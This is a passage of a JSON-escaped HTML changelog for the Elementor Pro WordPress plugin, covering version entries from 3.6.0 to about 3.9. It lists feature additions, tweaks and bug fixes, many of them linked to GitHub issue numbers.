focus in edit mode<\\/li>\\n<li>Tweak: Upgrade the autoprefixer package to better minify CSS files<\\/li>\\n<li>Tweak: Removed duplicate SQL queries on every page for better performance<\\/li>\\n<li>Tweak: Improved License validation mechanism to avoid limitations<\\/li>\\n<li>Tweak: Added more units options to Border Width control in various elements<\\/li>\\n<li>Tweak: Added <code>em<\\/code> units to Border Radius control in various elements<\\/li>\\n<li>Tweak: Added 'Equal height' functionality to Loop Grid widget<\\/li>\\n<li>Fix: Issue with Related Products widget and WooCommerce Pixel Manager plugin (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16934\\\">#16934<\\/a>)<\\/li>\\n<li>Fix: My Account widget gets hidden when using a single page template with post content (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19627\\\">#19627<\\/a>)<\\/li>\\n<li>Fix: Cart is not updated when cache enabled in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19312\\\">#19312<\\/a>)<\\/li>\\n<li>Fix: Entrance animations are not working as expected with Infinite Loop and Load on CLick pagination in Loop Grid widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20293\\\">#20293<\\/a>)<\\/li>\\n<li>Fix: Loading page issues in Form Submissions screen (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19973\\\">#19973<\\/a>)<\\/li>\\n<li>Fix: Recently Edited date and time not working as expected in Elementor Overview plugin in WordPress dashboard (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17966\\\">#17966<\\/a>)<\\/li>\\n<li>Fix: Recurring license mismatch error message when using translators plugins<\\/li>\\n<li>Fix: Submenu items triggers page transition instead of opening in Nav Menu widget<\\/li>\\n<li>Fix: Query values of Posts widget are not imported correctly when importing a Kit<\\/li>\\n<li>Fix: Loop items are exceeding the widget boundaries in Loop Grid widget<\\/li>\\n<li>Fix: Order by option is not working as expected when choosing Upsells, Cross-Sells and Related Products query in Products widget<\\/li>\\n<li>Fix: Various widgets disappear in certain scenarios when choosing direction Row or Column in Container<\\/li>\\n<\\/ul>\\n<h4>3.8.2 - 2022-11-20<\\/h4>\\n<ul>\\n<li>Fix: Z-index issues when applying sticky to Container<\\/li>\\n<li>Fix: Error message appears on front with Editor and Shop Manager roles when using the Loop Builder widget<\\/li>\\n<\\/ul>\\n<h4>3.8.1 - 2022-11-06<\\/h4>\\n<ul>\\n<li>Fix: Sticky inner section is not staying in the column when applying sticky option in Sections (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20203\\\">#20203<\\/a>)<\\/li>\\n<li>Fix: Post Title widget located in a loop item template disappears when enabling the hide title option inside page settings (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20207\\\">#20207<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20255\\\">#20255<\\/a>)<\\/li>\\n<li>Fix: ACF Dynamic data not rendering correctly in various scenarios (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20235\\\">#20235<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20258\\\">#20258<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20277\\\">#20277<\\/a>)<\\/li>\\n<li>Fix: Z-index issues when applying sticky to Container (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20227\\\">#20227<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.8.0 - 2022-10-30<\\/h4>\\n<ul>\\n<li>New: Introducing Loop Builder as a beta status experiment - Create powerful & repeating loop templates and populate each one with dynamic content and design flexibility (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4440\\\">#4440<\\/a>)<\\/li>\\n<li>Tweak: Add <code>wp_body_open()<\\/code> to header in Header template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11562\\\">#11562<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15828\\\">#15828<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13089\\\">#13089<\\/a>)<\\/li>\\n<li>Tweak: Added support border-radius option to the Code Highlight widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14316\\\">#14316<\\/a>)<\\/li>\\n<li>Tweak: Import\\/Export CLI and UI mechanisms were merged into a unified service<\\/li>\\n<li>Tweak: User with no permission to Notes cannot be mentioned in a note<\\/li>\\n<li>Tweak: User with no permission to view a post cannot be mentioned in a note<\\/li>\\n<li>Tweak: Notes was added to the right click context-menu<\\/li>\\n<li>Tweak: Notes panel can be resizable<\\/li>\\n<li>Tweak: Notes panel can be dragged outside of the canvas in responsive mode in the editor<\\/li>\\n<li>Tweak: Updated form validation messages translation strings in Form widget<\\/li>\\n<li>Tweak: Updated translators comments<\\/li>\\n<li>Tweak: Theme Builder logo and Title should be clickable<\\/li>\\n<li>Tweak: Reduced API requests and DB calls on non-write setup<\\/li>\\n<li>Tweak: Added media queries to the Table of Contents widget<\\/li>\\n<li>Fix: Sticky option is not working as expected in various scenarios in Container (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18357\\\">#18357<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19540\\\">#19540<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19618\\\">#19618<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19777\\\">#19777<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19827\\\">#19827<\\/a>)<\\/li>\\n<li>Fix: Mixed Content errors on HTTPS in Video Playlist Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18895\\\">#18895<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18945\\\">#18945<\\/a>)<\\/li>\\n<li>Fix: Note's timestamp is being updated according to the last activity in Notes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19123\\\">#19123<\\/a>)<\\/li>\\n<li>Fix: Accessibility attribute <code>role=navigation<\\/code> is redundant in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17582\\\">#17582<\\/a>)<\\/li>\\n<li>Fix: Accessibility attribute <code>role=navigation<\\/code> is redundant in pagination in Posts widget<\\/li>\\n<li>Fix: Share buttons is accessible with keyboard but not clickable<\\/li>\\n<li>Fix: Sub-items icons style is missing in preview with Inline Font Icons experiment in Nav Menu widget<\\/li>\\n<li>Fix: Quotes are appearing as HTML when editing a note in Notes<\\/li>\\n<li>Fix: Label's Icon height increases when Inline Font Icons experiment is active in Hotspot Widget<\\/li>\\n<li>Fix: Sub conditions of templates are not overridden when importing a Kit<\\/li>\\n<li>Fix: X\\/Y Anchor Point controls were not visible for Scale and Rotate effects<\\/li>\\n<li>Fix: PHP warning notice appears in some situations when using motion effects<\\/li>\\n<\\/ul>\\n<h4>3.7.7 - 2022-09-20<\\/h4>\\n<ul>\\n<li>Fix: Default Flex Grow affects the layout when the container is set to direction Column in various widgets<\\/li>\\n<\\/ul>\\n<h4>3.7.6 - 2022-09-14<\\/h4>\\n<ul>\\n<li>Fix: Submissions menu item appears at the bottom of Elementor section in WordPress dashboard<\\/li>\\n<\\/ul>\\n<h4>3.7.5 - 2022-08-31<\\/h4>\\n<ul>\\n<li>Fix: Error message appears on front if WooCommerce is activated (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19553\\\">#19553<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.7.4 - 2022-08-29<\\/h4>\\n<ul>\\n<li>Tweak: PHP 5.6 Is deprecated<\\/li>\\n<li>Fix: Triangle icon is not being displayed in the Select field when Inline Font Icons Experiment is active in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18598\\\">#18598<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19495\\\">#19495<\\/a>)<\\/li>\\n<li>Fix: The page jumps or flickers to the video playlist on page reload in Video Playlist Widget<\\/li>\\n<\\/ul>\\n<h4>3.7.3 - 2022-07-31<\\/h4>\\n<ul>\\n<li>Tweak: Improved license mechanism for correct validation<\\/li>\\n<li>Fix: Sticky option causes unexpected results when using the Container (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18357\\\">#18357<\\/a>)<\\/li>\\n<li>Fix: Price list, Portfolio, Flip Box and Gallery widgets disappear when the direction is set to column in Container (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18880\\\">#18880<\\/a>)<\\/li>\\n<li>Fix: Quotes character is showing up as <code>&quot;<\\/code> when editing a note in Notes<\\/li>\\n<\\/ul>\\n<h4>3.7.2 - 2022-06-15<\\/h4>\\n<ul>\\n<li>Tweak: Applied optimized file handling in various modules<\\/li>\\n<li>Fix: Related posts query options are missing in Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18633\\\">#18633<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18641\\\">#18641<\\/a>)<\\/li>\\n<li>Fix: Menu Cart Icon is not being displayed on all browsers when Inline Font Icons Experiment is active (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17705\\\">#17705<\\/a>)<\\/li>\\n<li>Fix: Gallery widget is not working as expected in Container element (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18408\\\">#18408<\\/a>)<\\/li>\\n<li>Fix: Flip box is not visible when the direction is set to Row in Container element (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18413\\\">#18413<\\/a>)<\\/li>\\n<li>Fix: Portfolio widget is not visible when dragged into "Row" direction Container element (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17653\\\">#17653<\\/a>)<\\/li>\\n<li>Fix: Menu cart is open automatically in Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18629\\\">#18629<\\/a>)<\\/li>\\n<li>Fix: PHP error is being shown the license is expired in License screen<\\/li>\\n<\\/ul>\\n<h4>3.7.1 - 2022-05-16<\\/h4>\\n<ul>\\n<li>Fix: Notes icon appears as an empty square in admin top bar for users with permissions lower than Editor<\\/li>\\n<li>Fix: Notes experiment causes a PHP fatal error on some cases<\\/li>\\n<li>Fix: UI glitches in Notes feature<\\/li>\\n<\\/ul>\\n<h4>3.7.0 - 2022-05-10<\\/h4>\\n<ul>\\n<li>New: Introducing Notes - Work collaboratively directly within Elementor<\\/li>\\n<li>New: Stripe Button widget - Collect Stripe payments directly from your site (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14748\\\">#14748<\\/a>)<\\/li>\\n<li>New: Meet WooCommerce Add to Cart dynamic tag - add products to cart from every widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10607\\\">#10607<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11801\\\">#11801<\\/a>)<\\/li>\\n<li>New: Added WooCommerce Product Content dynamic tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16367\\\">#16367<\\/a>)<\\/li>\\n<li>Tweak: Added Related, Upsells and Cross-Sells query sources to Products widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8071\\\">#8071<\\/a>)<\\/li>\\n<li>Tweak: Added custom icon control to Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18007\\\">#18007<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14357\\\">#14357<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13151\\\">#13151<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11361\\\">#11361<\\/a>)<\\/li>\\n<li>Tweak: Added an option to minimize on Desktop device in Table of Contents widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9933\\\">#9933<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag controls to Share Buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10729\\\">#10729<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag controls to Media Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10314\\\">#10314<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag controls to Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6327\\\">#6327<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6691\\\">#6691<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11774\\\">#11774<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9051\\\">#9051<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag controls to Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6327\\\">#6327<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag controls to Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5760\\\">#5760<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9774\\\">#9774<\\/a>)<\\/li>\\n<li>Tweak: Added align button to bottom option in various Product widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10263\\\">#10263<\\/a>)<\\/li>\\n<li>Tweak: Added align button to bottom control in Posts and Archive Posts widgets<\\/li>\\n<li>Tweak: Added the ability to hide and show the coupon section in WooCommerce Cart widget<\\/li>\\n<li>Tweak: Added the ability to hide and show the coupon section in WooCommerce Checkout widget<\\/li>\\n<li>Tweak: Added alignment option to various buttons in WooCommerce Cart widget<\\/li>\\n<li>Tweak: Added alignment option to various buttons in WooCommerce Checkout widget<\\/li>\\n<li>Tweak: Added percentage unit to padding control in Additional Information customize section in WooCommerce Checkout widget<\\/li>\\n<li>Tweak: Added quick link to create new theme parts directly from the Finder<\\/li>\\n<li>Tweak: Added the option to add a custom template to Dashboard screen in My Account widget<\\/li>\\n<li>Tweak: Added spacing control to view cart button in various product widgets<\\/li>\\n<li>Tweak: Added the option to add a custom template to empty cart state in Cart widget<\\/li>\\n<li>Tweak: Adjusted the layout of the Payment Methods screen in the My Account widget<\\/li>\\n<li>Tweak: Added lazy load option to Media Carousel, Reviews and Testimonial Carousel widgets<\\/li>\\n<li>Tweak: Added Site Identity quick link to Logo widget<\\/li>\\n<li>Tweak: Added Site Identity quick link to Site Title widget<\\/li>\\n<li>Tweak: Created an attribute that allows disabling page transition for specific links<\\/li>\\n<li>Tweak: Added dynamic tag controls to Gallery widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Countdown widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Portfolio widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Price Table widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Login widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Blockquote widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Facebook Comments widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Post Navigation widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Search Form widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Author Box widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Post info widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Archive Posts widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Product Meta widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Archive Products widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Sitemap widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Reviews widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Code Highlight widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to PayPal Button widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to WooCommerce Checkout widget<\\/li>\\n<li>Tweak: Added missing PHP documentation to hooks<\\/li>\\n<li>Fix: Scrolling glitches on mobile devices when Sticky Effect is enabled (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17767\\\">#17767<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18330\\\">#18330<\\/a>)<\\/li>\\n<li>Fix: Only 1st honypot field is validated when using multiple honeypot fields in Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18136\\\">#18136<\\/a>)<\\/li>\\n<li>Fix: Checkout button background color is not working as expected in Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18289\\\">#18289<\\/a>)<\\/li>\\n<li>Fix: Button labels are not accessible for screen readers in Share buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8615\\\">#8615<\\/a>)<\\/li>\\n<li>Fix: Downloads titles controls are not working in responsive in WooCommerce Purchase Summary widget<\\/li>\\n<li>Fix: Excerpt length is not working as expected in Posts and Archive Posts widgets<\\/li>\\n<li>Fix: Titles & Totals weight is not working in WooCommerce Checkout widget<\\/li>\\n<li>Fix: Product image is not appearing on Single Product Page on template load<\\/li>\\n<li>Fix: Additional Information title not editable in some scenarios in WooCommerce Checkout widget<\\/li>\\n<li>Fix: Cart is not updating automatically on mobile in Cart widget<\\/li>\\n<li>Fix: UI Glitch in Masonry control in Portfolio widget<\\/li>\\n<li>Fix: Custom breakpoints experiment didn't work on Single post and page templates<\\/li>\\n<li>Fix: Testimonial carousel & Reviews widgets disregards the <code>alt<\\/code> attribute<\\/li>\\n<li>Fix: Playlist widget deeplink didn't send user directly to the widget in the page<\\/li>\\n<li>Fix: Masonry option causes the images to disappear in the Editor in Posts widget<\\/li>\\n<li>Fix: Scrollbar appears after clicking on the dropdown toggle in Nav Menu widget<\\/li>\\n<li>Fix: Custom icons disappear on frontend if the pack name contains numbers<\\/li>\\n<li>Fix: Custom Font disappears if the name contains only numbers<\\/li>\\n<li>Fix: <code>end-section()<\\/code> is missing from Progress Tracker and Facebook Embed widgets<\\/li>\\n<li>Tweak: Added a filter for conditions cache query in Theme Builder<\\/li>\\n<li>Fix: Customizations lost on Ajax refresh in WooCommerce Cart widget<\\/li>\\n<li>Fix: Hello theme Header and Footer experiment is not working when WooCommerce plugin is active<\\/li>\\n<li>Fix: Color controls are not working as expected in Checkout widget<\\/li>\\n<li>Fix: Color controls are not working as expected in My Account widget<\\/li>\\n<li>Fix: Empty state widget preview in the editor is disappearing in various widgets<\\/li>\\n<li>Fix: Cart is not updating automatically on mobile in WooCommerce Cart widget<\\/li>\\n<li>Deprecated: See all deprecations to this version in our <a href=\\\"https:\\/\\/developers.elementor.com\\/v3-7-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a><\\/li>\\n<\\/ul>\\n<h4>3.6.5 - 2022-04-12<\\/h4>\\n<ul>\\n<li>Fix: Compatibility issues for several widgets in iOS 14 and macOS 13 devices (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18090\\\">#18090<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15910\\\">#15910<\\/a>)<\\/li>\\n<li>Fix: Button Alignment doesn't work in Custom Add To Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17810\\\">#17810<\\/a>)<\\/li>\\n<li>Fix: PHP warning is thrown in some cases in PayPal button widget<\\/li>\\n<li>Fix: PHP 8.1 throws errors and notices in some cases<\\/li>\\n<li>Fix: PHP notice was thrown when Kit Import process initiated without display conditions<\\/li>\\n<li>Fix: Create Account button always opens on the Sign Up screen even if the user has an account in Onboarding process<\\/li>\\n<\\/ul>\\n<h4>3.6.4 - 2022-03-15<\\/h4>\\n<ul>\\n<li>Tweak: Kit import dynamic reference support for templates and dynamic tags<\\/li>\\n<li>Tweak: Updated tested up to version tag to <code>3.6.0<\\/code><\\/li>\\n<li>Fix: Sticky caused scrolling issues after clicking an element that expands the page height (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17821\\\">#17821<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17839\\\">#17839<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18069\\\">#18069<\\/a>)<\\/li>\\n<li>Fix: When saving Global widget JS error is being thrown and editor fails to load (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17954\\\">#17954<\\/a>)<\\/li>\\n<li>Fix: Motion effects are missing from Background section under Style tab in Container element (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18063\\\">#18063<\\/a>)<\\/li>\\n<li>Fix: Imported Kit doesn't appear in the theme builder after successful import in some cases<\\/li>\\n<li>Fix: Added future Pro support to fix the Cart icon that shifted aside in Menu cart widget<\\/li>\\n<\\/ul>\\n<h4>3.6.3 - 2022-02-28<\\/h4>\\n<ul>\\n<li>Fix: Custom Code display conditions modal is not working (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17865\\\">#17865<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17942\\\">#17942<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17994\\\">#17994<\\/a>)<\\/li>\\n<li>Fix: Share buttons are not accessible for keyboard navigation (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8615\\\">#8615<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.6.2 - 2022-02-14<\\/h4>\\n<ul>\\n<li>Fix: Auto updates mechanism is not working as expected (this version might be also installed automatically)<\\/li>\\n<\\/ul>\\n<h4>3.6.1 - 2022-02-09<\\/h4>\\n<ul>\\n<li>Tweak: Allow connecting via generic source for future feature support<\\/li>\\n<li>Fix: Custom Code doesn't work when WooCommerce is active (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17675\\\">#17675<\\/a>)<\\/li>\\n<li>Fix: Content animation didn't work when Improved asset loading experiment is active Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17055\\\">#17055<\\/a>)<\\/li>\\n<li>Fix: PHP warning appears some times when trying to force-check for available updates<\\/li>\\n<li>Fix: Page transitions are being triggered when not needed<\\/li>\\n<li>Fix: Text alignment on Tablet responsive device affects base device in Testimonial Carousel widget<\\/li>\\n<li>Fix: Harden Submissions feature to prevent potential security issues<\\/li>\\n<li>Fix: Page Transitions Icon option Preloader doesn't work on frontend<\\/li>\\n<\\/ul>\\n<h4>3.6.0 - 2022-01-31<\\/h4>\\n<ul>\\n<li>New: WooCommerce Purchase Summary widget - Fully customize the content and style of your order summary page (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5756\\\">#5756<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15862\\\">#15862<\\/a>)<\\/li>\\n<li>New: WooCommerce Notices styling on Site Settings - Customize the appearance of WooCommerce notices (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14570\\\">#14570<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15896\\\">#15896<\\/a>)<\\/li>\\n<li>New: WooCommerce Notices widget - Set the position of WooCommerce notices on your shop pages (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8124\\\">#8124<\\/a>)<\\/li>\\n<li>Experiment: Page Transitions - Customize the page loading experience, and increase brand recognition (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10576\\\">#10576<\\/a>)<\\/li>\\n<li>Tweak: Added WooCommerce & Theme Elements widgets to Improved CSS Loading experiment to save up 126KB per page load (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17412\\\">#17412<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17337\\\">#17337<\\/a>)<\\/li>\\n<li>Tweak: Added new layout options in WooCommerce Add To Cart and WooCommerce Custom Add To Cart widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5437\\\">#5437<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10617\\\">#10617<\\/a>)<\\/li>\\n<li>Tweak: Added Stroke functionality for typography control in various widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11158\\\">#11158<\\/a>)<\\/li>\\n<li>Tweak: Removed <code>elementor-section-wrap<\\/code> by adding it to the Optimized DOM Output experiment (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16950\\\">#16950<\\/a>)<\\/li>\\n<li>Tweak: Added style controls for variations in WooCommerce Menu Cart widget<\\/li>\\n<li>Tweak: Added color control to navigation dots in Media Carousel, Reviews, and Slides widgets<\\/li>\\n<li>Tweak: Disabled Vimeo autoplay on edit mode when getting video data in Video Playlist widget<\\/li>\\n<li>Tweak: Added notice about Facebook's new EU consent policy in Facebook Button, Facebook Comments, Facebook Embed, and Facebook Page widgets<\\/li>\\n<li>Tweak: Refactor string translation calls to use native WP translation methods<\\/li>\\n<li>Tweak: Convert <code>home_url<\\/code> license API call to <code>get_site_url<\\/code> for better compatibility<\\/li>\\n<li>Tweak: Promoted Default to New Theme Builder and Scroll Snap experiments to Stable status in Experiments screen<\\/li>\\n<li>Tweak: Scroll Snap experiment set to active by default for all websites in Experiments screen<\\/li>\\n<li>Tweak: Scrolling Effects in Header and Section backgrounds are not working as expected when effects are relative to the entire page<\\/li>\\n<li>Tweak: Added "Auto Updates" capability to Pro versions<\\/li>\\n<li>Tweak: Removed sequenced animation hover effect option from Classic skin in Call to Action widget<\\/li>\\n<li>Tweak: Added "Excerpt Length" control in Post Excerpt widget<\\/li>\\n<li>Tweak: Deleted deprecated methods from Query Control module<\\/li>\\n<li>Tweak: Adjusted Inline-CSS Experiment to work with Additional Custom Breakpoints experiment<\\/li>\\n<li>Fix: Automatically open cart functionality didn't work in product page in WooCommerce Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5921\\\">#5921<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16276\\\">#16276<\\/a>,<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16879\\\">#16879<\\/a>)<\\/li>\\n<li>Fix: Buttons are not visible when there are too many products in the cart in WooCommerce Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16221\\\">#16221<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17283\\\">#17283<\\/a>,<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16333\\\">#16333<\\/a>,<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13005\\\">#13005<\\/a>)<\\/li>\\n<li>Fix: Mini cart modal z-index is too low in WooCommerce Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16333\\\">#16333<\\/a>)<\\/li>\\n<li>Fix: Side cart buttons are not visible at first glance on mobile in WooCommerce Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16221\\\">#16221<\\/a>)<\\/li>\\n<li>Fix: Read More field recognizes inline HTML elements as plain text in Posts and Archive Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16985\\\">#16985<\\/a>)<\\/li>\\n<li>Fix: Load More functionality caused JS error console in Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17036\\\">#17036<\\/a>)<\\/li>\\n<li>Fix: Autoplay is not working as expected when the lazy load is active in Video Playlist widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15304\\\">#15304<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16274\\\">#16274<\\/a>)<\\/li>\\n<li>Fix: Right navigation area wasn't 100% clickable in Post Navigation widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14252\\\">#14252<\\/a>)<\\/li>\\n<li>Fix: Posts duplicate when there are two Posts widgets inside a page using pagination functionality (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17056\\\">#17056<\\/a>)<\\/li>\\n<li>Fix: Global widget changes are not reflected on frontend (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16820\\\">#16820<\\/a>)<\\/li>\\n<li>Fix: JS Error console message when using the Load More functionality and Post Per Page option in Posts widget<\\/li>\\n<li>Fix: Heading styling is not being loaded when Inline CSS experiment is active in Post and Page Title widgets<\\/li>\\n<li>Fix: Sticky offset not working as expected when changing device mode on the browser<\\/li>\\n<li>Fix: Scroll Snap functionality wasn't applied on Templates and Archives<\\/li>\\n<li>Fix: Toggle icon color didn't work on hover state when Inline Font Icons experiment is activated in Nav Menu widget<\\/li>\\n<li>Fix: Variations 